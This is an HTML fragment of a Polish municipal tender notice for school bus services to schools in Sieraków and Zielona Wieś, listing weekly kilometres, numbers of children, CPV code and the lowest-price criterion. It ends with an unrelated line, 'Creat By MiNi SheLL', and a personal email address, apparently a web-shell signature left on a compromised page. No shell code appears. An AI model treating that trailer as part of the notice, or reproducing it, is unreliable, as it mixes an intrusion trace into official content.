<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje usługi związane z dowozem dzieci do Szkoły Podstawowej w Zielonej Wsi wraz z odwiezieniem tych dzieci do miejsce ich zamieszkania oraz zapewnieniem stałej opieki nad dziecmi. Przewóz dzieci odbywać się będzie wg ustalonych tras. Ilość wozokilometrów czynnych (przebiegi z dziecmi) w ciągu tygodnia wynosi 203 wzkm, ilość dzieci 70.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 18.06.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dowóz dzieci do Gimnazjum w Sierakowie oraz ZSS -Pakiet IVA.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje usługi związane z dowozem dzieci do Gimnazjum w Sierakowie wraz z odwiezieniem tych dzieci do miejsce ich zamieszkania oraz zapewnieniem stałej opieki nad dziecmi. Przewóz dzieci odbywać się będzie wg ustalonych tras. Ilość wozokilometrów czynnych (przebiegi z dziecmi) w ciągu tygodnia wynosi 200 wzkm, ilość dzieci 63.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 18.06.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dowóz dzieci do Gimnazjum w Sierakowie - PAKIET IVB.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje usługi związane z dowozem dzieci do Gimnazjum w Sierakowie wraz z odwiezieniem tych dzieci do miejsce ich zamieszkania oraz zapewnieniem stałej opieki nad dziecmi. Przewóz dzieci odbywać się będzie wg ustalonych tras. Ilość wozokilometrów czynnych (przebiegi z dziecmi) w ciągu tygodnia wynosi 120 wzkm, ilość dzieci 73.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 18.06.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dowóz dzieci do Gimnazjum w Sierakowie - PAKIET IVC.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje usługi związane z dowozem dzieci do Gimnazjum w Sierakowie wraz z odwiezieniem tych dzieci do miejsce ich zamieszkania oraz zapewnieniem stałej opieki nad dziecmi. Przewóz dzieci odbywać się będzie wg ustalonych tras. Ilość wozokilometrów czynnych (przebiegi z dziecmi) w ciągu tygodnia wynosi 229,50 wzkm, ilość dzieci 52.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 18.06.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Dowóz dzieci do Gimnazjum w Sierakowie - PAKIET IVD.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje usługi związane z dowozem dzieci do Gimnazjum w Sierakowie wraz z odwiezieniem tych dzieci do miejsce ich zamieszkania oraz zapewnieniem stałej opieki nad dziecmi. Przewóz dzieci odbywać się będzie wg ustalonych tras. Ilość wozokilometrów czynnych (przebiegi z dziecmi) w ciągu tygodnia wynosi 245  wzkm, ilość dzieci 80.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 18.06.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com